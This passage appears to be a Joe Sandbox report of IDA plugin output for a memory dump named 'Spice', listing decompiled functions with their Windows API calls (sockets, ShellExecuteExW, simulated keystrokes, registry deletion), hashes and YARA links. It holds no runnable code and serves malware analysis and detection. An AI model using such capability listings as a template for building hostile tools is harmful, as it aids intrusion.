Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 34546f2863662f167506be7a1d859ed6633a86fcbe34680e3ef701df7fad3567
Instruction ID: 38c7f6117755dde2571c2890cb713d1951b53b4ee52e03a4f44a1b6119ec4e22
Opcode Fuzzy Hash: 34546f2863662f167506be7a1d859ed6633a86fcbe34680e3ef701df7fad3567
Instruction Fuzzy Hash: 3141DC316046849AD7375728CC88BAA7B92FB86314F24F41EF68F76560CB76B840D715

Uniqueness

Uniqueness Score: -1.00%

Function 00ED7681 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00ED7698

Part of subcall function 00E90FE6: std::exception::exception.LIBCMT ref: 00E9101C
Part of subcall function 00E90FE6: __CxxThrowException@8.LIBCMT ref: 00E91031

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00ED76CF
EnterCriticalSection.KERNEL32(?), ref: 00ED76EB
_memmove.LIBCMT ref: 00ED7739
_memmove.LIBCMT ref: 00ED7756
LeaveCriticalSection.KERNEL32(?), ref: 00ED7765
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00ED777A
InterlockedExchange.KERNEL32(?,000001F6), ref: 00ED7799

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 349b2320d094c1a0690235f3fedf78c78271eaa4097833e4ff3e4e4e5094b3da
Instruction ID: e7f0d2c985e68298f2191bbbcc3f42d127857a1620a86ca952ee4aa8b1f608ed
Opcode Fuzzy Hash: 349b2320d094c1a0690235f3fedf78c78271eaa4097833e4ff3e4e4e5094b3da
Instruction Fuzzy Hash: 2E315C31A04209EFCF10EF64DC85EAEB7B8FF45710F1440A6F904AA256EB709A55DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EF67F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00EF6810
GetDC.USER32(00000000), ref: 00EF6818
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EF6823
ReleaseDC.USER32(00000000,00000000), ref: 00EF682F
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00EF686B
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00EF687C
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00EF964F,?,?,000000FF,00000000,?,000000FF,?), ref: 00EF68B6
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00EF68D6

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: d53d73ccc174060bb336d196a613308488001d01d2c62a27a6c9b26ef02a8f31
Instruction ID: e2d65a86d11f33d97e0a8af1766f5fc356f1ebd36ab059fded6070e6310154cf
Opcode Fuzzy Hash: d53d73ccc174060bb336d196a613308488001d01d2c62a27a6c9b26ef02a8f31
Instruction Fuzzy Hash: A8316D72101258BFEB158F10CC4AFEA3BADFF49765F044055FE08AA291CA759851DBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00ECC748 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00ECC75D
_memcmp.LIBCMT ref: 00ECC77F
_memcmp.LIBCMT ref: 00ECC797
_memcmp.LIBCMT ref: 00ECC7AA
_memcmp.LIBCMT ref: 00ECC7C4
_memcmp.LIBCMT ref: 00ECC7D7
_memcmp.LIBCMT ref: 00ECC7EF
_memcmp.LIBCMT ref: 00ECC80A

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 21962c1ce48ed34360eb241adb6322efee4e1e07a27dbd8f7efc6192bca139da
Instruction ID: b0a10da480a60acc17f2ec7ccc2c395b3d09ea109da9f35b47577a4e8de902fd
Opcode Fuzzy Hash: 21962c1ce48ed34360eb241adb6322efee4e1e07a27dbd8f7efc6192bca139da
Instruction Fuzzy Hash: 7921C873B452067AE60575208F42FAF379CDE11748B286029FD0AB6383E712DE13D6A2

Uniqueness

Uniqueness Score: -1.00%

Function 00EDF166 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00E74D37: __itow.LIBCMT ref: 00E74D62
Part of subcall function 00E74D37: __swprintf.LIBCMT ref: 00E74DAC

Part of subcall function 00E8436A: _wcscpy.LIBCMT ref: 00E8438D

_wcstok.LIBCMT ref: 00EDF2D7
_wcscpy.LIBCMT ref: 00EDF366
_memset.LIBCMT ref: 00EDF399

Strings

X, xrefs: 00EDF3D6

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 7ed210c486d0a6a0007684d83b361cd2e5330afe8ebbe2532e5db434207269c6
Instruction ID: a8f592050af68d01408e9cfe56de16212db1de5c05974d58fc80ca7608ab7447
Opcode Fuzzy Hash: 7ed210c486d0a6a0007684d83b361cd2e5330afe8ebbe2532e5db434207269c6
Instruction Fuzzy Hash: C5C16B715043419FC714EF24D881A5AB7E4EF85354F10996EF89AAB3A2DB30ED46CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00EE71EE Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00EE72EB
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00EE730C
WSAGetLastError.WSOCK32(00000000), ref: 00EE731F
htons.WSOCK32(?,?,?,00000000,?), ref: 00EE73D5
inet_ntoa.WSOCK32(?), ref: 00EE7392

Part of subcall function 00ECB4EA: _strlen.LIBCMT ref: 00ECB4F4
Part of subcall function 00ECB4EA: _memmove.LIBCMT ref: 00ECB516

_strlen.LIBCMT ref: 00EE742F
_memmove.LIBCMT ref: 00EE7498

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 7aabde84d6f3bf4bc3602184a2516697b89efb1ec687a7d5534a4fbad004e2fe
Instruction ID: 3eecfec21549b79a1fdff32c296e61d0895faceeb59aeb061c1ce91e40b7c762
Opcode Fuzzy Hash: 7aabde84d6f3bf4bc3602184a2516697b89efb1ec687a7d5534a4fbad004e2fe
Instruction Fuzzy Hash: 1681C2B1108244ABC710EB25DC81F6AB7E8EF88714F10A51CF599BB2E2EB70DD01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E71800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 796295da2aa4b7fa4c0ee97650b492fc78e2d956e1259b2bad4191fef13e264a
Instruction ID: ad7a8332cda7a70e4862368de3314bc3f934713c23e0be46a3c84d6ab24cfcf7
Opcode Fuzzy Hash: 796295da2aa4b7fa4c0ee97650b492fc78e2d956e1259b2bad4191fef13e264a
Instruction Fuzzy Hash: BF714F30900209EFDB08CF58CC45ABE7B75FF8A314F14C199F919BA251C730AA51DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EFB9C3 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(013B5878), ref: 00EFBA5D
IsWindowEnabled.USER32(013B5878), ref: 00EFBA69
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00EFBB4D
SendMessageW.USER32(013B5878,000000B0,?,?), ref: 00EFBB84
IsDlgButtonChecked.USER32(?,?), ref: 00EFBBC1
GetWindowLongW.USER32(013B5878,000000EC), ref: 00EFBBE3
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00EFBBFB

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: e078afbb3635f0f6904c6b554efde725dce7a7e0423ededc8fbd85e100233fbb
Instruction ID: 55657abd44b3e49ec9161b4fdc501fbcf6fb79f8691e43bc6dab5386ce3e0f41
Opcode Fuzzy Hash: e078afbb3635f0f6904c6b554efde725dce7a7e0423ededc8fbd85e100233fbb
Instruction Fuzzy Hash: 5B71DD3460460CEFDB21DF54C894FBABBBAFF49314F145059EA45A72A1DB32AC40DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00EEFB07 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EEFB31
_memset.LIBCMT ref: 00EEFBFA
ShellExecuteExW.SHELL32(?), ref: 00EEFC3F

Part of subcall function 00E74D37: __itow.LIBCMT ref: 00E74D62
Part of subcall function 00E74D37: __swprintf.LIBCMT ref: 00E74DAC

Part of subcall function 00E8436A: _wcscpy.LIBCMT ref: 00E8438D

GetProcessId.KERNEL32(00000000), ref: 00EEFCB6
CloseHandle.KERNEL32(00000000), ref: 00EEFCE5

Strings

@, xrefs: 00EEFC0E

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 6866401cc34cf46e6b0ee84f172c7836df53aca35dd4612229e0cfbf039e60ac
Instruction ID: 9f1bde1a141b1ae5eef09862c6890e30cc8bb8f0019d4570f8896d6739830bc4
Opcode Fuzzy Hash: 6866401cc34cf46e6b0ee84f172c7836df53aca35dd4612229e0cfbf039e60ac
Instruction Fuzzy Hash: 8561AAB5A00619DFCB14EFA5C4909AEB7F4FF08310F249469E84ABB391CB30AD41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00ED174C Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00ED178B
GetKeyboardState.USER32(?), ref: 00ED17A0
SetKeyboardState.USER32(?), ref: 00ED1801
PostMessageW.USER32(?,00000101,00000010,?), ref: 00ED182F
PostMessageW.USER32(?,00000101,00000011,?), ref: 00ED184E
PostMessageW.USER32(?,00000101,00000012,?), ref: 00ED1894
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00ED18B7

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 846fb4c1e2efc4920f00f07c8812afa9c42519df3c6b6e5cfd153d819180a7ae
Instruction ID: 96fe02d066e509494e055ea42c085b6963a41eff19da1e8a5d9111d739516e6b
Opcode Fuzzy Hash: 846fb4c1e2efc4920f00f07c8812afa9c42519df3c6b6e5cfd153d819180a7ae
Instruction Fuzzy Hash: 1B51F7A0A087D53DFB368234CC15BBA7EE9AB06308F0C55CBE0D566AD2C695DCC6E750

Uniqueness

Uniqueness Score: -1.00%

Function 00ED1565 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00ED15A4
GetKeyboardState.USER32(?), ref: 00ED15B9
SetKeyboardState.USER32(?), ref: 00ED161A
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00ED1646
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00ED1663
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00ED16A7
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00ED16C8

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: af8655ec60672ec6bfe10f2ffe3cbdb768991acbf9f7661684aad0732b0dd0d3
Instruction ID: 68ee710a84b251eae82346f88cba793e5e571529ff7688afc85d620783945e71
Opcode Fuzzy Hash: af8655ec60672ec6bfe10f2ffe3cbdb768991acbf9f7661684aad0732b0dd0d3
Instruction Fuzzy Hash: 7F5118A06047D53DFB3283248C01BBA7EE9EB06304F0C54CBE0E5666C2C695EC96E750

Uniqueness

Uniqueness Score: -1.00%

Function 00ED5BB8 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00ED5BC5
_wcsncpy.LIBCMT ref: 00ED5BFA
_wcsncpy.LIBCMT ref: 00ED5C2C
_wcsncpy.LIBCMT ref: 00ED5C5F
_wcsncpy.LIBCMT ref: 00ED5CA1
_wcsncpy.LIBCMT ref: 00ED5CDB
_wcsncpy.LIBCMT ref: 00ED5D0A

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 00bd6ae4f16184333548a70861faaedd2b5a871e08852ecab2f74aa7f9da3162
Instruction ID: cae7b5bafff6147f07e542bd5d18f0103191328cded17995594f00321b51b2a0
Opcode Fuzzy Hash: 00bd6ae4f16184333548a70861faaedd2b5a871e08852ecab2f74aa7f9da3162
Instruction Fuzzy Hash: 27416FA6C2061875CF11FBF4C8869CFB7F9EF04310F51A856E519F3221E634A61687A6

Uniqueness

Uniqueness Score: -1.00%

Function 00ED3B64 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00ED4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00ED3B8A,?), ref: 00ED4BE0

Part of subcall function 00ED4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00ED3B8A,?), ref: 00ED4BF9

lstrcmpiW.KERNEL32(?,?), ref: 00ED3BAA
_wcscmp.LIBCMT ref: 00ED3BC6
MoveFileW.KERNEL32(?,?), ref: 00ED3BDE
_wcscat.LIBCMT ref: 00ED3C26
SHFileOperationW.SHELL32(?), ref: 00ED3C92

Strings

\*.*, xrefs: 00ED3C20

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: a7fbb7f4eee0e2b846b4c995840037b1b73e9c8ef6b459cb06b44092a6f8b5c8
Instruction ID: a7b1c7690e27745c1b24507c866df1ee586f52b1843ae7ab76433c6806fed1c5
Opcode Fuzzy Hash: a7fbb7f4eee0e2b846b4c995840037b1b73e9c8ef6b459cb06b44092a6f8b5c8
Instruction Fuzzy Hash: 08418E71508344AAC752EB74C481ADFB7ECEF98340F40296FF489E3291EB35D6498B52

Uniqueness

Uniqueness Score: -1.00%

Function 00EF78B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EF78CF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EF7976
IsMenu.USER32(?), ref: 00EF798E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EF79D6
DrawMenuBar.USER32 ref: 00EF79E9

Strings

0, xrefs: 00EF78C3

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 5db64ee8245b1a25882fd26e5ae05fb79e41f03fadc75bdd21ea6f9d31be3426
Instruction ID: b626e469625090ca8d1fdb275434be41126776df03b7ea2ccb6419d9251c09cb
Opcode Fuzzy Hash: 5db64ee8245b1a25882fd26e5ae05fb79e41f03fadc75bdd21ea6f9d31be3426
Instruction Fuzzy Hash: FE413771A08209EFDB20DF54D884AEABBB5FB45314F05912DEA95AB250C770ED50DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EF1602 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00EF1631
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EF165B
FreeLibrary.KERNEL32(00000000), ref: 00EF1712

Part of subcall function 00EF1602: RegCloseKey.ADVAPI32(?), ref: 00EF1678
Part of subcall function 00EF1602: FreeLibrary.KERNEL32(?), ref: 00EF16CA
Part of subcall function 00EF1602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00EF16ED

RegDeleteKeyW.ADVAPI32(?,?), ref: 00EF16B5

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: da891efdb6f4edc2776e7d1d3e579bca97bd4b7aebb8669de449d8759f8c2c8f
Instruction ID: de0d2cafc907b1ace8fe0a419e47d638b3e896cbd1e8f2eed41e114c4771c959
Opcode Fuzzy Hash: da891efdb6f4edc2776e7d1d3e579bca97bd4b7aebb8669de449d8759f8c2c8f
Instruction Fuzzy Hash: F1311AB190110DFFDB149B90DC89AFEB7BCEF09304F0411AAEA15E2150EB749E45AAA4

Uniqueness

Uniqueness Score: -1.00%

Function 00EF68F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00EF6911
GetWindowLongW.USER32(013B5878,000000F0), ref: 00EF6944
GetWindowLongW.USER32(013B5878,000000F0), ref: 00EF6979
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00EF69AB
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00EF69D5
GetWindowLongW.USER32(00000000,000000F0), ref: 00EF69E6
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00EF6A00

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 07db82591805d0c915603770e9e77e16ee60f3a97027bb401f1c48e7753733df
Instruction ID: 36f9c1f3cf6ecf118491f6cb64df7a7fd580c174ca1f9cecfcf3b9760aeadf9a
Opcode Fuzzy Hash: 07db82591805d0c915603770e9e77e16ee60f3a97027bb401f1c48e7753733df
